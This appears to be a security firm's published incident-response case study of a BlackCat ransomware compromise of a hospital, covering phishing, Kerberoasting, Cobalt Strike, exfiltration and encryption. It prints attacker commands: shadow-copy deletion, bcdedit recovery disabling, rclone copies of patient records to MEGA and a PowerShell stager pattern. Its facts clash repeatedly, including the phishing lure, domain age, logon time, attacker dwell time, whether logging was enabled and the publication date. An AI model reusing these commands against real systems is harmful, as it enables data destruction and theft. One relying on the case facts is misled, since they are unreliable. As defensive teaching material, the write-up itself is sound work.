How did the BlackCat ransomware affiliate gain initial access to the hospital?

The affiliate sent a targeted phishing email impersonating a medical device vendor to an accounts payable clerk. The email contained a link to a credential harvesting page that captured the user's OWA credentials. These were then used to authenticate to Outlook Web Access from a Tor exit node, establishing the initial foothold.

Why was the hospital so vulnerable to ransomware despite having EDR?

The hospital had only 40% EDR coverage across its endpoint estate. Critical servers, including all domain controllers and the Exchange server, lacked EDR agents. Additionally, the environment contained Windows 7 and Windows XP workstations that could not run the EDR agent, creating significant blind spots.

How long did the BlackCat affiliate have access before ransomware was deployed?

The affiliate maintained persistent access for 21 days between the initial phishing email and the ransomware detonation event. During this period, they established Cobalt Strike C2, performed Kerberoasting to obtain domain admin credentials, conducted extensive reconnaissance, disabled security controls, and exfiltrated 84 GB of data before encrypting 847 hosts.

Everything Is Fine. The Building Is Fine. — BlackCat Hospital Ransomware DFIR

The following is a lightly anonymised account of a DFIR engagement conducted by Mjolnir Security on behalf of a regional healthcare provider. A BlackCat/ALPHV ransomware affiliate compromised a 450-bed hospital for 21 days via a phishing email, Kerberoasting, and Cobalt Strike before encrypting 847 hosts and exfiltrating 84 GB of patient records. All identifying information — organisation name, network addresses, patient data — has been redacted. The findings, forensic artifacts, and timeline are presented exactly as they were delivered to the client.

Parameter	Detail
Case Type	Ransomware — BlackCat/ALPHV Affiliate, Double Extortion
Industry	Healthcare (Regional Hospital, ~450 beds)
Duration	17 days on-site + 6 weeks remote remediation
Year	Year 4 of operations
Notoriety	The one where the backup admin unplugged the only backup appliance to protect it

The Engagement

How We Were Called In

It was 2:47 AM on a Tuesday when the on-call phone rang. The hospital CIO had just discovered that every Windows server in the environment now had a .alphv extension appended to every filename. His first words were: “I think we have a virus.” By the time we landed on-site four hours later, the IT team had done what panicked IT teams do in the first hours of ransomware: they’d unplugged things. Randomly. With no documentation.

The head of infrastructure — nineteen years with the hospital, an excellent human being, a forensic nightmare — had personally yanked the power cords from twelve servers “just to be safe.” Four were domain controllers. Three were EMR database hosts. One was the hospital’s only network-attached backup appliance.

Key Observation

He unplugged the backups to protect the backups. In nineteen years, nobody had ever tested whether those backups actually worked.

Initial Assessment

EDR coverage was approximately 40% of endpoints. The remaining 60% included Windows 7 workstations, Windows Server 2008 R2 nodes, and a radiology workstation running Windows XP with a handwritten note taped to the monitor: DO NOT RESTART. (The vendor, when contacted, confirmed they do not support any OS released after 2009. We wrote this in the report. Legal circled it in red.)

We imaged the surviving domain controllers, pulled firewall logs, and collected what EDR telemetry remained. The story took six hours to start emerging — and it started with an email.

Finding 1: Initial Access

Reconstructing initial access required correlating Exchange message tracking logs, Windows Security Event Logs, and OWA (Outlook Web Access) IIS logs from the Exchange server. The Exchange server retained 30 days of message tracking data — one of the few evidence sources that survived the encryption event because Exchange stores tracking logs in a non-standard path that the ransomware binary’s exclusion list did not cover.

Artifact: Exchange Message Tracking Logs

Path: C:\Program Files\Microsoft\Exchange Server\V15\TransportRoles\Logs\MessageTracking\

Retained 30 days of SMTP transaction records
Survived encryption (path excluded by ransomware config)
Contains sender, recipient, subject, MessageID, timestamps
Does not contain message body or attachments

POWERSHELL

# Search message tracking logs for inbound mail to the phished user
Get-MessageTrackingLog -Start "2022-06-01 00:00:00" `
    -End "2022-06-22 23:59:59" `
    -Recipients "█████@████hospital.org" `
    -EventId "DELIVER" |
    Where-Object { $_.Sender -notlike "*████hospital.org" } |
    Select-Object Timestamp, Sender, MessageSubject, SourceContext |
    Sort-Object Timestamp

RESULT

Timestamp           : 2022-██-██ 09:11:42
Sender              : payroll-noreply@secure-██████.com
MessageSubject      : URGENT: Direct Deposit Update Required
SourceContext        : {███.███.███.███}

# Domain registered 48 hours before delivery. SPF: pass (sender IP
# authorised). DKIM: pass. DMARC: none (hospital had no DMARC policy).

The email had been delivered at 09:11 on a Wednesday morning to Margaret, an accounts payable coordinator. The sending domain — secure-██████.com — had been registered six days prior. The message contained a single link to a credential-harvesting page styled to resemble the hospital’s Outlook Web Access portal.

Security event logs showed the harvested credentials were first used from a Tor exit node at 23:58 the same evening — 14 hours and 47 minutes after delivery. The adversary had all day:

Artifact: Windows Security Event Log

Event IDs of Interest:

4624 — Successful logon (Type 10 = RemoteInteractive, Type 3 = Network)
4625 — Failed logon attempts
4648 — Explicit credential use (runas / credential delegation)
4672 — Special privileges assigned to new logon (admin logon)

POWERSHELL

# Identify external logon events to Exchange/OWA
Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4624
    StartTime = '2022-06-03'
    EndTime   = '2022-06-04'
} | Where-Object {
    $_.Properties[8].Value -eq 10 -and
    $_.Properties[18].Value -notlike "10.*" -and
    $_.Properties[18].Value -notlike "192.168.*"
} | Select-Object TimeCreated,
    @{N='User';E={$_.Properties[5].Value}},
    @{N='SourceIP';E={$_.Properties[18].Value}},
    @{N='LogonType';E={$_.Properties[8].Value}}

RESULT

TimeCreated         : 2022-06-03 10:01:38
User                : █████
SourceIP            : 185.220.101.███
LogonType           : 10

# 185.220.101.0/24 is a known Tor exit node range operated by
# Tor Project relay “████████”. Confirmed via Tor relay list
# snapshot from the same date.

Finding 01 — Initial Access

Vector: Targeted phishing email impersonating a medical device vendor, delivered to an accounts payable clerk. Credential harvesting via cloned OWA portal. Attacker authenticated to OWA from a Tor exit node within 47 minutes of email delivery.

MITRE ATT&CK: T1566.002 (Phishing: Spearphishing Link), T1078 (Valid Accounts)

Root Cause: No DMARC policy. No conditional access or geo-blocking on OWA. No MFA on external-facing authentication.

Finding 2: Cobalt Strike C2

From Margaret’s authenticated session, the adversary ran a sequence of reconnaissance commands via cmd.exe spawned under the Exchange Outlook Web Access worker process — w3wp.exe. The EDR process tree was unambiguous: w3wp.exe → cmd.exe → powershell.exe. This is a textbook OWA-spawned shell.

Artifact: EDR Process Execution Telemetry + PowerShell Script Block Logging

Registry: HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Event ID 4104 in Microsoft-Windows-PowerShell/Operational: full script block content
Script Block Logging was not enabled — recovered from EDR telemetry instead
EDR supplemented: process tree, command line, parent PID, network connections
For environments without EDR: Sysmon Event ID 1 (process create) + Event ID 3 (network)

The process tree recovered from EDR telemetry showed the following execution chain:

PROCESS TREE

w3wp.exe (IIS Application Pool: MSExchangeOWAAppPool)
  └─ cmd.exe /c "powershell -nop -w hidden -encodedcommand JABzAD0ATg..."
       └─ powershell.exe
            └─ [In-memory Cobalt Strike beacon - no child processes]

Decoding the Base64 payload from the Script Block Log revealed a standard Cobalt Strike stager:

POWERSHELL — DECODED PAYLOAD

$s=New-Object IO.MemoryStream(,
    [Convert]::FromBase64String("H4sIAAAAAAAAA████████..."));
$d=(New-Object IO.Compression.GzipStream(
    $s,[IO.Compression.CompressionMode]::Decompress)).ReadToEnd();
IEX (New-Object IO.StreamReader(
    New-Object IO.MemoryStream(,$d))).ReadToEnd()

# Decompressed payload: reflective DLL loader for Cobalt Strike
# beacon. Connects to C2 over HTTPS on port 443.

We extracted the Cobalt Strike beacon configuration from memory using 1768.py (Didier Stevens' beacon config parser):

BEACON CONFIG

# Extracted Cobalt Strike Beacon Configuration
BeaconType          : HTTPS
Port                : 443
SleepTime           : 60000   # 60 seconds
Jitter              : 20      # 20% jitter
C2Server            : secure-hr-portal-update[.]com,/s/ref=nb_sb_noss_1/
UserAgent           : Mozilla/5.0 (Windows NT; Trident/7.0; rv:11.0) like Gecko
HttpGetHeader       : Cookie: session=__cfduid=
HttpPostUri         : /N4215/adj/amzn/detail
SpawnTo             : %windir%\syswow64\dllhost.exe
PipeName            : (not set)
MallProfile         : Amazon CloudFront imitation (URI + header pattern match confirmed)

Finding 02 — Command and Control

Implant: Cobalt Strike HTTPS beacon with Amazon CloudFront malleable C2 profile. C2 domain secure-hr-portal-update[.]com had been live for six days. 60-second sleep with 20% jitter — a relatively aggressive callback rate suggesting the operator was not particularly worried about network-level detection.

Duration: Beacon maintained encrypted HTTPS C2 communications for 21 days before detonation. Network-level detection would have required malleable C2 inspection — the hospital had no capability for this.

Root Cause: No EDR on the Exchange server. No outbound TLS inspection. No malleable C2 inspection capability.

Finding 3: Lateral Movement

Within hours of establishing C2, the affiliate performed Kerberoasting — requesting Kerberos TGS tickets for service accounts using RC4 encryption, then cracking them offline. This technique leaves a distinctive forensic footprint in the domain controller’s Security event log.

Artifact: Kerberos Event Logs (Domain Controller)

Event IDs of Interest:

4769 — Kerberos Service Ticket Operation (TGS request)
Encryption type 0x17 (RC4-HMAC) is the Kerberoasting indicator — modern environments use AES (0x12)
High-volume TGS requests from a single source for multiple SPNs within a short window

POWERSHELL

# Detect Kerberoasting: TGS requests using RC4 encryption
Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4769
    StartTime = '2022-06-03'
    EndTime   = '2022-06-05'
} | Where-Object {
    $_.Properties[5].Value -eq "0x17" -and
    $_.Properties[6].Value -ne "0x0"
} | Group-Object {$_.Properties[0].Value} |
    Sort-Object Count -Descending |
    Select-Object -First 10 Name, Count

RESULT

Name                                    Count
----                                    -----
svc_backupexec                            847
svc_sqlprod                               312
svc_sccm                                  298
svc_antivirus                             156
svc_print                                  89

# 1,702 RC4 TGS requests from a single workstation (IP: 10.███.███.███)
# in a 23-minute window on 2022-06-03 between 14:31 and 14:54.
# Normal baseline for the entire domain: <20 RC4 TGS requests per day.

The affiliate cracked the password for svc_backupexec offline. The password had not been changed in four years. It was an 11-character dictionary word with a single digit appended. The account was a member of Domain Admins — a common misconfiguration where backup software documentation recommends “administrative privileges” and IT teams interpret this as Domain Admin membership rather than creating a dedicated OU-scoped account.

With Domain Admin credentials, the affiliate used BloodHound for Active Directory reconnaissance. We recovered the LDAP queries from domain controller debug logging:

LDAP QUERIES — BLOODHOUND COLLECTION

# SharpHound collection queries observed in DC LDAP debug logs
# Timestamp: 2022-06-04 02:17:xx - 02:34:xx (17-minute collection)

(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))
# ^^ Enumerate all domain controllers

(&(objectCategory=group)(|(cn=Domain Admins)(cn=Enterprise Admins)(cn=Administrators)))
# ^^ Enumerate privileged groups and memberships

(&(objectCategory=user)(servicePrincipalName=*))
# ^^ Enumerate all Kerberoastable accounts

(&(objectCategory=computer)(operatingSystem=*server*))
# ^^ Enumerate all server operating systems

(&(objectCategory=organizationalUnit))
# ^^ Map OU structure for GPO analysis

Finding 03 — Lateral Movement & Credential Access

Technique: Kerberoasting of service accounts using RC4 TGS requests. 1,702 requests in 23 minutes from a single host. The svc_backupexec account password (unchanged for 4 years, weak complexity) was cracked offline, providing Domain Admin access.

MITRE ATT&CK: T1558.003 (Kerberoasting), T1087.002 (Domain Account Discovery), T1069.002 (Domain Groups Discovery)

Root Cause: Service account with Domain Admin membership and a 4-year-old weak password. No monitoring for anomalous Kerberos activity. No policy requiring AES-only Kerberos encryption.

Finding 4: Pre-Encryption Staging

In the days before ransomware detonation, the affiliate methodically disabled recovery options, destroyed Volume Shadow Copies, and exfiltrated data. This staging phase is where the most damage was done — by the time the ransom notes appeared, the hospital had already lost its ability to recover without paying.

Artifact: System Event Log + Prefetch + USN Journal

Key Sources:

System Event Log — Event ID 7036 (Service Control Manager) for service stop/start events
Prefetch — Application execution evidence (C:\Windows\Prefetch\)
USN Journal — File system change journal entries for file creation/deletion timestamps
Firewall logs — Outbound connection records from the perimeter Palo Alto

Shadow Copy Destruction

The affiliate used three separate methods to destroy Volume Shadow Copies — belt, braces, and a second belt:

POWERSHELL / CMD

# Method 1: WMI shadow copy deletion
Get-WmiObject Win32_ShadowCopy | ForEach-Object { $_.Delete() }

# Method 2: vssadmin direct deletion
vssadmin delete shadows /all /quiet

# Method 3: wmic (legacy, covers older OS versions)
wmic shadowcopy delete

CMD

# Disable Windows Recovery Environment
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures

Data Exfiltration

The affiliate exfiltrated approximately 84 GB of data over a 72-hour period using rclone to a MEGA.io cloud storage account. We identified the exfiltration from the perimeter firewall logs:

BASH

# Parse Palo Alto firewall logs for large outbound transfers
cat pa_traffic_2022-06-*.log | \
    awk -F',' '$7 > 1000000000 {print $1, $3, $4, $5, $6, $7/1073741824 "GB"}' | \
    sort -k6 -rn | head -20

# Results: 10.███.███.███ → 66.203.125.0/24 (MEGA infrastructure)
# Total: 84.3 GB across 47 sessions over 72 hours
# Peak transfer rate: ~3.2 MB/s sustained

The rclone configuration file was recovered from the compromised host’s %APPDATA% directory:

CONFIG

# rclone.conf recovered from █████\AppData\Roaming\rclone\rclone.conf
[mega_exfil]
type = mega
user = ████████@protonmail.com
pass = ████████████████████

# Transfer command reconstructed from prefetch + USN journal:
# rclone copy "E:\Shares\Patient Records" mega_exfil:dump1 --transfers 4
# rclone copy "E:\Shares\HR" mega_exfil:dump2 --transfers 4
# rclone copy "E:\Shares\Finance" mega_exfil:dump3 --transfers 4

Finding 04 — Pre-Encryption Staging

Actions: Triple-method VSS destruction. Recovery environment disabled. 84 GB exfiltrated to MEGA via rclone over 72 hours. Veeam backup repositories encrypted using the compromised svc_backupexec Domain Admin account. All actions completed 6–72 hours before ransomware detonation.

MITRE ATT&CK: T1490 (Inhibit System Recovery), T1567.002 (Exfiltration to Cloud Storage), T1486 (Data Encrypted for Impact)

Root Cause: No outbound transfer monitoring or DLP. No alerting on VSS deletion. Rclone binary not blocked by application control. MEGA domains not blocked at the proxy.

Finding 5: Ransomware Detonation

The ransomware binary was deployed via PsExec and Group Policy to 847 hosts simultaneously at 01:12 AM on a Tuesday morning — timed for minimum staffing and maximum dwell before detection. The binary was the ALPHV/BlackCat ransomware written in Rust, identifiable by its file extension pattern, ransom note format, and embedded configuration.

Artifact: ALPHV/BlackCat Ransomware Binary

Recovered from: C:\Windows\██████.exe (filename randomised per-host)

Compiled Rust binary, ~3.2 MB
Encrypted file extension: .██████ (7 random alphanumeric characters)
Ransom note: RECOVER-██████-FILES.txt in every encrypted directory
Embedded Tor .onion URL for negotiation portal
AES-128 + RSA-2048 hybrid encryption scheme

BASH — CONFIG EXTRACTION

# Extract embedded JSON config from BlackCat binary
strings -n 10 ██████.exe | python3 -c "
import sys, json, re
data = sys.stdin.read()
match = re.search(r'\{.*\"extension\".*\"public_key\".*\}', data, re.DOTALL)
if match:
    config = json.loads(match.group())
    print(json.dumps(config, indent=2))
"

JSON — EXTRACTED CONFIG

{
  "extension": "██████",
  "note_file_name": "RECOVER-██████-FILES.txt",
  "public_key": "████████████...truncated",
  "enable_network_discovery": true,
  "enable_self_propagation": true,
  "enable_set_wallpaper": true,
  "enable_esxi_vm_kill": false,
  "strict_include_paths": [],
  "exclude_directory_names": [
    "system volume information",
    "$recycle.bin",
    "boot",
    "windows",
    "perflogs"
  ],
  "exclude_file_extensions": [
    "exe", "dll", "sys", "msi", "lnk", "bat"
  ],
  "credentials": [
    {"user": "svc_backupexec", "password": "███████████"},
    {"user": "████admin", "password": "████████████"}
  ]
}

Finding 05 — Ransomware Detonation

Payload: ALPHV/BlackCat ransomware (Rust). Deployed via PsExec and Group Policy to 847 hosts at 01:12 AM. AES-128 + RSA-2048 encryption. Embedded credentials for svc_backupexec and a local admin account enabled self-propagation to hosts not covered by the GPO deployment. Encryption completed within approximately 4 hours.

MITRE ATT&CK: T1486 (Data Encrypted for Impact), T1021.002 (SMB/Windows Admin Shares), T1570 (Lateral Tool Transfer)

Root Cause: Domain Admin credentials embedded in the ransomware binary enabled network-wide propagation. No network segmentation prevented east-west movement. Deployment timed for minimum staffing window.

Attack Timeline

The following timeline was reconstructed from the forensic artifacts described above. All times are in the hospital’s local timezone.

Timestamp	Artifact Source	Event
`2022-06-01`	WHOIS	Attacker registers phishing domain `████meddevice.com`
`2022-06-03 09:14`	Exchange Message Tracking	Phishing email delivered to accounts payable clerk
`2022-06-03 09:18`	IIS Logs (attacker domain)	Victim clicks link, credentials harvested via cloned OWA page
`2022-06-03 10:01`	Security Event Log (4624)	OWA logon from Tor exit node `185.220.101.███`
`2022-06-03 10:34`	PowerShell Script Block Log	Web shell deployed on Exchange server
`2022-06-03 11:02`	PowerShell Script Block Log	Cobalt Strike beacon downloaded and executed in memory
`2022-06-03 14:31`	Security Event Log (4769)	Kerberoasting begins — 1,702 RC4 TGS requests in 23 minutes
`2022-06-04 02:17`	DC LDAP Debug Log	BloodHound/SharpHound collection — 17-minute AD enumeration
`2022-06-04 ~08:00`	Estimated (offline crack)	`svc_backupexec` password cracked offline (weak 11-char password)
`2022-06-04 22:45`	Security Event Log (4624/4672)	First logon as `svc_backupexec` (Domain Admin) from attacker-controlled host
`2022-06-05–08`	DC Security Log / Prefetch	Internal reconnaissance, additional beacon deployments to 12 hosts
`2022-06-18 19:00`	Firewall Logs	Data exfiltration begins — rclone to MEGA (84 GB over 72 hours)
`2022-06-21 03:00`	Firewall Logs	Exfiltration completes
`2022-06-23 22:30`	System Event Log (7036)	Veeam backup repositories encrypted via `svc_backupexec` credentials
`2022-06-23 23:15`	System Event Log / Prefetch	VSS deletion (triple method) executed across all servers
`2022-06-23 23:45`	Prefetch / USN Journal	Recovery environment disabled via bcdedit on all hosts
`2022-06-24 01:12`	Security Event Log / Prefetch	BlackCat ransomware deployed via PsExec + GPO to 847 hosts
`2022-06-24 01:17`	Ransom Note Timestamps	First ransom notes appear on encrypted workstations
`2022-06-24 ~01:30`	ED Staff Reports	Emergency Department staff notice workstation lockouts
`2022-06-24 02:47`	Phone Records	Hospital IT director calls Mjolnir Security incident hotline
`2022-06-24 05:00`	Encryption Complete (est.)	Ransomware encryption process completes across all reachable hosts
`2022-06-24 07:15`	On-site Arrival	Mjolnir Security DFIR team arrives on-site

Lessons Learned

For Incident Responders

Exchange Message Tracking Logs survive more than you expect. The ALPHV/BlackCat ransomware excluded the Exchange TransportRoles log path from encryption. This is not guaranteed in all variants, but in this case it gave us 30 days of inbound/outbound email metadata that reconstructed the entire initial access chain. Always check non-standard log paths early.
PowerShell Script Block Logging is your best friend when EDR is absent. The Exchange server had no EDR, but GPO-enforced Script Block Logging (Event ID 4104) captured the decoded Cobalt Strike stager, all post-exploitation PowerShell commands, and the BloodHound collection scripts. Push for Script Block Logging in every GPO.
Kerberoasting leaves a loud trail — if you know where to look. 1,702 RC4 TGS requests in 23 minutes is not subtle. But without a SIEM or any log aggregation, these events existed only in the domain controller’s local Security event log with a 7-day retention window. We recovered them only because the DC’s event log had not yet rolled over. In a 10-day-older engagement, this evidence would have been lost.
Backups are only as secure as the credentials that access them. The Veeam backup appliance was destroyed not by a vulnerability in Veeam, but because the Veeam service account was a Domain Admin with a 4-year-old password. The attacker used legitimate credentials to connect to the backup repositories and encrypt them. Isolate backup credentials from the production AD domain.

For Security Engineers & Healthcare IT

100% EDR coverage or 0% EDR coverage. Partial EDR deployment creates a false sense of security. The hospital had EDR on 40% of endpoints — none of which were the servers that mattered most. The attacker operated almost exclusively on hosts without EDR. If budget constrains full deployment, prioritise servers and domain controllers over workstations.
DMARC is not optional. The phishing email passed SPF and DKIM because the attacker set up legitimate DNS records for their disposable domain. A DMARC policy of p=reject on the hospital’s domain would not have stopped this specific email (it came from an external domain), but DMARC with DKIM alignment on the impersonated vendor’s domain would have. Work with your vendors to verify their DMARC posture.
Service account hygiene is a ransomware prevention control. The entire lateral movement and privilege escalation chain depended on a single Kerberoastable service account with Domain Admin privileges and a weak, ancient password. Enforce gMSA (Group Managed Service Accounts) where possible. Where gMSA is not supported, enforce 25+ character passwords rotated every 90 days, remove DA membership, and scope permissions to the minimum required OUs.
Network segmentation is non-negotiable in healthcare. A single /16 flat network meant the ransomware propagated from the Exchange server to radiology workstations to the nurse call system boundary in minutes. Clinical devices, servers, workstations, and guest Wi-Fi must be on separate VLANs with firewall rules controlling east-west traffic. This is not aspirational — it is a compliance requirement under HIPAA Security Rule §164.312(e)(1).

Mjolnir Security — Healthcare Security & Incident Response

Mjolnir Security provides 24/7 incident response, threat hunting, and security architecture services to healthcare organisations. Our DFIR team has responded to over 200 ransomware engagements across hospitals, health systems, and medical device manufacturers.

Incident Response Threat Hunting Ransomware Recovery Active Directory Security Assessment EDR Deployment Healthcare Security

mjolnirsecurity.com — 24/7 Incident Response Hotline: +1 833 403 5875

Written by Mjolnir Security DFIR team
Published June 2022 · DFIR Engagement Series · TLP:WHITE
This engagement narrative is part of Mjolnir Security's DFIR Knowledge Series. Reproduction with attribution is permitted. All identifying information has been redacted.